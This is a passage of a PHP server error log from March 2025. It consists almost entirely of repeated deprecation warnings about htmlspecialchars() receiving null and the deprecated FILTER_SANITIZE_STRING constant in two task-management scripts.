htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:25:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:25:31 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:25:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:33:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:33:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:33:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:34:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:36:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:37:01 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:37:18 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:37:59 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:38:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:38:35 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:38:48 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:39:21 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:39:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:40:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:40:26 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:41:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:41:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:42:15 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:42:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:43:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:43:42 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:43:55 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:44:07 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:44:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:44:40 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:45:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:45:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:45:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:46:06 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is 